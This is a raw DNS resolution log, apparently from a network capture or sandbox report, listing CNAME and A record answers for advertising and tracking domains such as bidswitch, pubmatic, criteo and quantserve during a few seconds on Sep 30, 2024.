                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.512864113 CEST1.1.1.1192.168.2.40xb9a3No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.512864113 CEST1.1.1.1192.168.2.40xb9a3No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.512864113 CEST1.1.1.1192.168.2.40xb9a3No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.513174057 CEST1.1.1.1192.168.2.40xfc63No error (0)ups.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.513174057 CEST1.1.1.1192.168.2.40xfc63No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.513174057 CEST1.1.1.1192.168.2.40xfc63No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.516819000 CEST1.1.1.1192.168.2.40x1fdeNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.516978025 CEST1.1.1.1192.168.2.40x2f73No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.516978025 CEST1.1.1.1192.168.2.40x2f73No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.727372885 CEST1.1.1.1192.168.2.40xb6abNo error (0)tg.socdm.comtg.dr.socdm.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.918278933 CEST1.1.1.1192.168.2.40x62fdNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.918278933 CEST1.1.1.1192.168.2.40x62fdNo error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:27.918998957 CEST1.1.1.1192.168.2.40xff9eNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.096735954 CEST1.1.1.1192.168.2.40x462cNo error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.097477913 CEST1.1.1.1192.168.2.40x9c40No error (0)secure-assets.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.215264082 CEST1.1.1.1192.168.2.40xd32No error (0)crb.kargo.com18.193.235.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.215264082 CEST1.1.1.1192.168.2.40xd32No error (0)crb.kargo.com18.158.122.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.215264082 CEST1.1.1.1192.168.2.40xd32No error (0)crb.kargo.com18.196.164.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.265611887 CEST1.1.1.1192.168.2.40xfbebNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.265611887 CEST1.1.1.1192.168.2.40xfbebNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.267442942 CEST1.1.1.1192.168.2.40xaf09No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.267442942 CEST1.1.1.1192.168.2.40xaf09No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.268416882 CEST1.1.1.1192.168.2.40x9d9No error (0)cm.g.doubleclick.net142.250.185.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.175.124.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.204.123.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.174.109.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.167.160.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.211.170.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.157.181.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.147.115.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.271872044 CEST1.1.1.1192.168.2.40x4ad2No error (0)sync.srv.stackadapt.com54.152.127.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.384370089 CEST1.1.1.1192.168.2.40x5ca5No error (0)beacon-ams3.rubiconproject.combeacon-ams3.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.387326956 CEST1.1.1.1192.168.2.40x5563No error (0)beacon-ams3.rubiconproject.combeacon-ams3.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.388375998 CEST1.1.1.1192.168.2.40xa479No error (0)s.amazon-adsystem.com98.82.156.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.391531944 CEST1.1.1.1192.168.2.40xc377No error (0)mwzeom.zeotap.com172.67.40.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.391531944 CEST1.1.1.1192.168.2.40xc377No error (0)mwzeom.zeotap.com104.22.51.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.391531944 CEST1.1.1.1192.168.2.40xc377No error (0)mwzeom.zeotap.com104.22.50.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.392441034 CEST1.1.1.1192.168.2.40x75d8No error (0)um.simpli.fi35.204.74.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.392441034 CEST1.1.1.1192.168.2.40x75d8No error (0)um.simpli.fi34.91.62.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.392441034 CEST1.1.1.1192.168.2.40x75d8No error (0)um.simpli.fi35.204.158.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.392652035 CEST1.1.1.1192.168.2.40xa146No error (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.396306992 CEST1.1.1.1192.168.2.40x650aNo error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.396306992 CEST1.1.1.1192.168.2.40x650aNo error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.396306992 CEST1.1.1.1192.168.2.40x650aNo error (0)spug-lhrc.pubmnet.com185.64.190.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.396344900 CEST1.1.1.1192.168.2.40xc22aNo error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.396344900 CEST1.1.1.1192.168.2.40xc22aNo error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.515445948 CEST1.1.1.1192.168.2.40x7d77No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.515445948 CEST1.1.1.1192.168.2.40x7d77No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.515445948 CEST1.1.1.1192.168.2.40x7d77No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com54.157.169.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.5.188.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.73.131.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.70.245.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.54.151.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.22.94.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com52.7.226.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.556818008 CEST1.1.1.1192.168.2.40xbe01No error (0)sync.ipredictive.com54.152.74.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557328939 CEST1.1.1.1192.168.2.40x6c72No error (0)match.deepintent.comm.deepintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557328939 CEST1.1.1.1192.168.2.40x6c72No error (0)m.deepintent.com8.18.47.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557328939 CEST1.1.1.1192.168.2.40x6c72No error (0)m.deepintent.com169.197.150.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557328939 CEST1.1.1.1192.168.2.40x6c72No error (0)m.deepintent.com169.197.150.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557328939 CEST1.1.1.1192.168.2.40x6c72No error (0)m.deepintent.com38.91.45.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557997942 CEST1.1.1.1192.168.2.40x1585No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557997942 CEST1.1.1.1192.168.2.40x1585No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557997942 CEST1.1.1.1192.168.2.40x1585No error (0)zemanta-nychi2.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.557997942 CEST1.1.1.1192.168.2.40x1585No error (0)nydc1.outbrain.org64.202.112.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.558660984 CEST1.1.1.1192.168.2.40x97f7No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.558660984 CEST1.1.1.1192.168.2.40x97f7No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.558660984 CEST1.1.1.1192.168.2.40x97f7No error (0)zemanta-nychi2.outbrain.orgchidc2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.558984995 CEST1.1.1.1192.168.2.40xe6a5No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.558984995 CEST1.1.1.1192.168.2.40xe6a5No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.559154987 CEST1.1.1.1192.168.2.40xcf27No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.559154987 CEST1.1.1.1192.168.2.40xcf27No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.559154987 CEST1.1.1.1192.168.2.40xcf27No error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:28.654038906 CEST1.1.1.1192.168.2.40x7ad1No error (0)pixel-sync.sitescout.com34.36.216.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.575973034 CEST1.1.1.1192.168.2.40xeb8aNo error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.576478958 CEST1.1.1.1192.168.2.40x75f8No error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.576478958 CEST1.1.1.1192.168.2.40x75f8No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.210.237.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.212.197.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.210.91.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.214.31.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io34.243.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.214.158.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.581176043 CEST1.1.1.1192.168.2.40x7dafNo error (0)match.prod.bidr.io52.31.14.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.610914946 CEST1.1.1.1192.168.2.40xc34dNo error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.610914946 CEST1.1.1.1192.168.2.40xc34dNo error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.610914946 CEST1.1.1.1192.168.2.40xc34dNo error (0)am1-direct-bgp.contextweb.com208.93.169.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.611752987 CEST1.1.1.1192.168.2.40xcaa8No error (0)bh.contextweb.comam1-bh.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.611752987 CEST1.1.1.1192.168.2.40xcaa8No error (0)am1-bh.contextweb.comam1-direct-bgp.contextweb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.763978004 CEST1.1.1.1192.168.2.40x2f29No error (0)dsp-ap.eskimi.com188.42.63.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.777740002 CEST1.1.1.1192.168.2.40x2e52No error (0)p.rfihub.coma.rfihub.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.777740002 CEST1.1.1.1192.168.2.40x2e52No error (0)a.rfihub.coma.rfihub.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.778011084 CEST1.1.1.1192.168.2.40xcb50No error (0)p.rfihub.coma.rfihub.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.778011084 CEST1.1.1.1192.168.2.40xcb50No error (0)a.rfihub.coma.rfihub.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.146.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.193.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.211.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.184.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.161.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.247.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.245.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.187.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.223.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.135.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.964637995 CEST1.1.1.1192.168.2.40xcb13No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.156.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:29.965837955 CEST1.1.1.1192.168.2.40xcfa5No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.107888937 CEST1.1.1.1192.168.2.40x9f93No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.109091043 CEST1.1.1.1192.168.2.40xef53No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.347645998 CEST1.1.1.1192.168.2.40x52a1No error (0)dis.criteo.comwidget.fr3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358620882 CEST1.1.1.1192.168.2.40x5bdNo error (0)live.primis.techd2wcz8sc48ztgm.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358778954 CEST1.1.1.1192.168.2.40xfc6fNo error (0)live.primis.techd2wcz8sc48ztgm.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358778954 CEST1.1.1.1192.168.2.40xfc6fNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358778954 CEST1.1.1.1192.168.2.40xfc6fNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358778954 CEST1.1.1.1192.168.2.40xfc6fNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.358778954 CEST1.1.1.1192.168.2.40xfc6fNo error (0)d2wcz8sc48ztgm.cloudfront.net13.32.99.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.404458046 CEST1.1.1.1192.168.2.40x3f83No error (0)t.adx.opera.comoutspot2-ams.adx.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.404458046 CEST1.1.1.1192.168.2.40x3f83No error (0)outspot2-ams.adx.opera.com82.145.213.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.406773090 CEST1.1.1.1192.168.2.40xcbb6No error (0)t.adx.opera.comoutspot2-ams.adx.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:30.536142111 CEST1.1.1.1192.168.2.40xf061No error (0)dsp-cookie.adfarm1.adition.com80.82.210.217A (IP address)IN (0x0001)false
